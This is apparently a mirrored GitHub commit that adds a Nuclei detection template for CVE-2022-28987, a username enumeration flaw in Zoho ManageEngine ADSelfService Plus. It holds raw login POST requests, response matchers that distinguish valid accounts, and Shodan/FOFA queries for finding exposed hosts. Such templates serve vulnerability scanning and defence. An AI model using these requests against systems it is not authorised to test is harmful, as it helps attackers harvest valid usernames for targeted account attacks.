mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-01-31 15:53:33 +08:00
Merge pull request #15085 from projectdiscovery/CVE-2022-28987
Create CVE-2022-28987.yaml
This commit is contained in:
Aman Rawat
58
http/cves/2022/CVE-2022-28987.yaml
Normal file
58
http/cves/2022/CVE-2022-28987.yaml
Normal file
@@ -0,0 +1,58 @@
|
|||||||
|
id: CVE-2022-28987
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Zoho ManageEngine ADSelfService Plus 6121 - Username Enumeration
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Zoho ManageEngine ADSelfService Plus 6121 is vulnerable to username enumeration (CVE-2022-28987). The Forgot Password functionality responds differently for existing and non-existing users, allowing attackers to enumerate valid usernames.
|
||||||
|
impact: |
|
||||||
|
Attackers can enumerate valid usernames, aiding targeted attacks or account harvesting.
|
||||||
|
remediation: |
|
||||||
|
Update to version 6202 or later.
|
||||||
|
reference:
|
||||||
|
- https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-28987
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.3
|
||||||
|
cve-id: CVE-2022-28987
|
||||||
|
cwe-id: CWE-203
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: false
|
||||||
|
shodan-query: http.title:"ADSelfService Plus"
|
||||||
|
fofa-query: title="ADSelfService Plus"
|
||||||
|
tags: cve,cve2022,zoho,manageengine,user-enum,adselfservice
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /ServletAPI/accounts/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
loginName=asdfnonexistent
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /ServletAPI/accounts/login HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
loginName=Guest
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "eSTATUS\":\"Permission Denied")'
|
||||||
|
- 'contains(content_type, "application/json")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "eSTATUS\":\"Your account has been disabled")'
|
||||||
|
- 'contains(content_type, "application/json")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
Reference in New Issue
Block a user